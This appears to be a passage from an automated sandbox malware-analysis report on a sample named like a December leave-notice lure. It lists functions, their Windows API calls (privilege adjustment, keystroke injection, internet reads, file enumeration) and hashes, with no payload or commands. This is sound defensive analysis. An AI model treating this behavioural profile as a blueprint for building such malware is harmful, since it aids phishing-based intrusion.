                                                      • Instruction ID: 8e3f617b84683bf24578490fb8f468a3eef90cfd38c307dc591ab97da69ef2e3
                                                      • Opcode Fuzzy Hash: 8c048803279c635c91507cec3eed2bea77d925e6be1d52b3f05f13d563c40e39
                                                      • Instruction Fuzzy Hash: 2941A371600100AFEB11AFA8CC42E7E77EEEF44724F144559F9569B382DBB89D01AB91
                                                      Function 00FCEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FCEB8A
                                                      • _wcscmp.LIBCMT ref: 00FCEBBA
                                                      • _wcscmp.LIBCMT ref: 00FCEBCF
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00FCEBE0
                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00FCEC0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 2387731787-0
                                                      • Opcode ID: 0dde1ad9d9b96c2a22b5e1e0d425a417ac77a5b024553161f1650f06f7457c28
                                                      • Instruction ID: c7506f16ba31cee8d498e533ff12588c00f97b569143e67efb8adc2914eb3658
                                                      • Opcode Fuzzy Hash: 0dde1ad9d9b96c2a22b5e1e0d425a417ac77a5b024553161f1650f06f7457c28
                                                      • Instruction Fuzzy Hash: 2C41CE35A003029FDB18DF68C892EAAB3E4FF49324F10455DE95ACB3A1DB35E944DB91
                                                      Function 00FE8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 12f236da4a72055a8ab43a44165ee3e3f6467eaefe38db1f08d77c111eca210d
                                                      • Instruction ID: 4a3118b8f8d85743b3cefe44a31e61c2a73bdc4e870bcdeae3be8fcfd8396be5
                                                      • Opcode Fuzzy Hash: 12f236da4a72055a8ab43a44165ee3e3f6467eaefe38db1f08d77c111eca210d
                                                      • Instruction Fuzzy Hash: BC119D327002516FE7226FA6DC44A6EBB98EF457A0F050429F84DD7281CF39E903A7A0
                                                      Function 00F89B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                      • API String ID: 0-1546025612
                                                      • Opcode ID: de319e216311cd41a0af64de7660cbf6cfa3c1c67a9eeeb5a389c3a7874f3a74
                                                      • Instruction ID: ab047f883b6bc708ab9b516cfa9bb3b017cc623a7d72f7f9aa46abce9bebadae
                                                      • Opcode Fuzzy Hash: de319e216311cd41a0af64de7660cbf6cfa3c1c67a9eeeb5a389c3a7874f3a74
                                                      • Instruction Fuzzy Hash: B4928B71E0421ACBEF25DF58C8407FDB7B1FB44314F1882AAE956AB280D7719981EF91
                                                      Function 00F9E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00F9E014,75920AE0,00F9DEF1,0101DC38,?,?), ref: 00F9E02C
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F9E03E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: 15f1f3dde7518b3b5c408a59853fa32f73a2fb72d6a90b2860d945ed506e163f
                                                      • Instruction ID: c6c53eaf1b24c9c9220521b4e34c3591abcbc98e7fc759cc85fded21209beb30
                                                      • Opcode Fuzzy Hash: 15f1f3dde7518b3b5c408a59853fa32f73a2fb72d6a90b2860d945ed506e163f
                                                      • Instruction Fuzzy Hash: D2D0C771900712AFDB329FE6E81965276DDAB44711F18841DE4D5D2114FFF8D8849770
                                                      Function 00FC13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FC13DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      • Opcode ID: d1516c1e7c04ac3db501c52c7c7289eea08bbe7f6da8aeef47d0e4d180b13cde
                                                      • Instruction ID: 9289f830d7fd877c4069b0fd0a2634ede00620f8b711bc21a72ec8a604a35c5e
                                                      • Opcode Fuzzy Hash: d1516c1e7c04ac3db501c52c7c7289eea08bbe7f6da8aeef47d0e4d180b13cde
                                                      • Instruction Fuzzy Hash: C8322575A006069FCB28CF69C581E6AB7F0FF49320B15C56EE49ADB3A2D770E951CB40
                                                      Function 00F9B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F9B22F
                                                        • Part of subcall function 00F9B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F9B5A5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Proc$LongWindow
                                                      • String ID:
                                                      • API String ID: 2749884682-0
                                                      • Opcode ID: 3cc257031f00819d48e2fb48632a8d806b3cabd779e9445b946257da536245d5
                                                      • Instruction ID: 8e4282381600fd3e255a89ddb8935a18c69e45ae1dd1efbeac1267dab1b672c0
                                                      • Opcode Fuzzy Hash: 3cc257031f00819d48e2fb48632a8d806b3cabd779e9445b946257da536245d5
                                                      • Instruction Fuzzy Hash: CBA16771514108BAFF3AAF6A7E88E7F395EEF85760B14411DF541D21A1DB299C00B372
                                                      Function 00FD4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00FD43BF,00000000), ref: 00FD4FA6
                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00FD4FD2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                      • String ID:
                                                      • API String ID: 599397726-0
                                                      • Opcode ID: dba6ab256c9bb631b8f455173aa2e45a46501d68d650877436e531dce0c38346
                                                      • Instruction ID: 94158b94f257ae1e2e90365216e355f6f987a5521b5b129e904c5548855851e4
                                                      • Opcode Fuzzy Hash: dba6ab256c9bb631b8f455173aa2e45a46501d68d650877436e531dce0c38346
                                                      • Instruction Fuzzy Hash: C241D672904605BFEB21CF84CC85FBF77AEEB40724F14402BF205A7290E675AE45B6A0
                                                      Function 00FCE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00FCE20D
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FCE267
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FCE2B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: cd0e4065e84fba34a84fd26d2132ee04edd73be488eba77f88efd294db2f3467
                                                      • Instruction ID: 3b2fdd79548e9773b3f3d96cb8bb0cd566dde044ac008c8346f1c66c1088d7b5
                                                      • Opcode Fuzzy Hash: cd0e4065e84fba34a84fd26d2132ee04edd73be488eba77f88efd294db2f3467
                                                      • Instruction Fuzzy Hash: 80215C35A00118EFDB00EFA5D995EEDFBB8FF48310F0484A9E945A7351DB359905DB60
                                                      Function 00FBB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9F4EA: std::exception::exception.LIBCMT ref: 00F9F51E
                                                        • Part of subcall function 00F9F4EA: __CxxThrowException@8.LIBCMT ref: 00F9F533
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FBB180
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FBB1AD
                                                      • GetLastError.KERNEL32 ref: 00FBB1BA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      • Opcode ID: 0c488b5df7f90778bcdd5d167355109779c7618139779730658a12256ef68c99
                                                      • Instruction ID: d77bdd54dd52224619c5c9d7dc63401243b0142090c77fde68429afdd6fe7479
                                                      • Opcode Fuzzy Hash: 0c488b5df7f90778bcdd5d167355109779c7618139779730658a12256ef68c99
                                                      • Instruction Fuzzy Hash: A311BFB2400205AFE728DF99DC85D6BB7ACEB44320B20852EF09693240DBB4FC418B60
                                                      Function 00FC6685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FC66AF
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00FC66EC
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00FC66F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: a58450c9cabf56dd2473f5b33ba3b158321dcb61f26d1de1d4847f350cd2fe6c
                                                      • Instruction ID: f17967274b9fea4d1d5586c4ff26d155978d845258566bef102d83363af7cfce
                                                      • Opcode Fuzzy Hash: a58450c9cabf56dd2473f5b33ba3b158321dcb61f26d1de1d4847f350cd2fe6c
                                                      • Instruction Fuzzy Hash: 0D11A5B1D00229BFE7119BE8DD45FAF7BBCEB04724F004555F901E7180C2789E0497A1
                                                      Function 00FC71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00FC7223
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FC723A
                                                      • FreeSid.ADVAPI32(?), ref: 00FC724A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: 095d9c60462a12e306f5ebcad53d9da7e3ab532fe541cce9df9372d74a1891d3
                                                      • Instruction ID: 7b9ad3406d3f4a937c8429fa02210e1142982f4b75124465d37ebaf365173de0
                                                      • Opcode Fuzzy Hash: 095d9c60462a12e306f5ebcad53d9da7e3ab532fe541cce9df9372d74a1891d3
                                                      • Instruction Fuzzy Hash: 2BF01D76E04309BFDF05DFE4D989EEEBBB8EF08201F104469B606E2181E2759A549B20
                                                      Function 00FCF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FCF599
                                                      • FindClose.KERNEL32(00000000), ref: 00FCF5C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 0bd251ab2046f9d82229c7fea46813455bf3a983ac3a6bc3ed4a553a9b763972
                                                      • Instruction ID: 43bc3126f978e7d6a583297989f908bd14ccb6cff3b6e256c18fadae6d885623
                                                      • Opcode Fuzzy Hash: 0bd251ab2046f9d82229c7fea46813455bf3a983ac3a6bc3ed4a553a9b763972
                                                      • Instruction Fuzzy Hash: 6611A5326002019FD710EF68D845A6EF3E9FF84324F04891DF9A5D7391CB34E9049B91
                                                      Function 00FCCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00FDBE6A,?,?,00000000,?), ref: 00FCCEA7
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00FDBE6A,?,?,00000000,?), ref: 00FCCEB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: ef65653873d4b8d0a3c709de6d41eca1ddb1f197785bb1db0f16f9fc4f69f119
                                                      • Instruction ID: 495d3bbb7368f9d13232a0817d23131fe592315978c5eb621ef2d7e399d8f4f8
                                                      • Opcode Fuzzy Hash: ef65653873d4b8d0a3c709de6d41eca1ddb1f197785bb1db0f16f9fc4f69f119
                                                      • Instruction Fuzzy Hash: D9F0EC3100022AABDB20ABE0CC49FEA336CBF093A1F00812AF809D6080C6349A40DBB0
                                                      Function 00FC411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00FC4153
                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00FC4166
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: 5168317b17685ba3c30486a05a3bb8bfa6ddd6ce97dcbd8ebac394fe2dd72b07
                                                      • Instruction ID: 4c9c5d2f1c3c361ae04c706e84ed5a3786b40a15802fef34a50ef2893f93a48c
                                                      • Opcode Fuzzy Hash: 5168317b17685ba3c30486a05a3bb8bfa6ddd6ce97dcbd8ebac394fe2dd72b07
                                                      • Instruction Fuzzy Hash: F4F06D7080024EAFDB168FA0C805BBE7FB0EF00305F048009F9A596191D77A96129FA0
                                                      Function 00FBAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FBACC0), ref: 00FBAB99
                                                      • CloseHandle.KERNEL32(?,?,00FBACC0), ref: 00FBABAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: f864e7766674baa7ac0c4a4341ec05d3700611311a8800cd16730caad3db06bd
                                                      • Instruction ID: b369f20cff40af138c3e0fe3235bb8270654c46833a6654927c85d06ccc72eb1
                                                      • Opcode Fuzzy Hash: f864e7766674baa7ac0c4a4341ec05d3700611311a8800cd16730caad3db06bd
                                                      • Instruction Fuzzy Hash: 21E0BF75000510AFEB262F95EC05D767BA9EB04320B15C529B49981474DB675D94AB50
                                                      Function 00FA81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00FA6DB3,-0000031A,?,?,00000001), ref: 00FA81B1
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FA81BA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: ded29e05faed25f362e4a15ef5ee77f738b744d3179e06db6336f626e5967061
                                                      • Instruction ID: 51077d72474791db714b4259c406eb778a5fed600cb321044047f1b59f32f38e
                                                      • Opcode Fuzzy Hash: ded29e05faed25f362e4a15ef5ee77f738b744d3179e06db6336f626e5967061
                                                      • Instruction Fuzzy Hash: 5CB09271048608ABDB222BE1E809B587F68EB08652F008010F64D440558B7754109BA1
                                                      Function 00F877B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
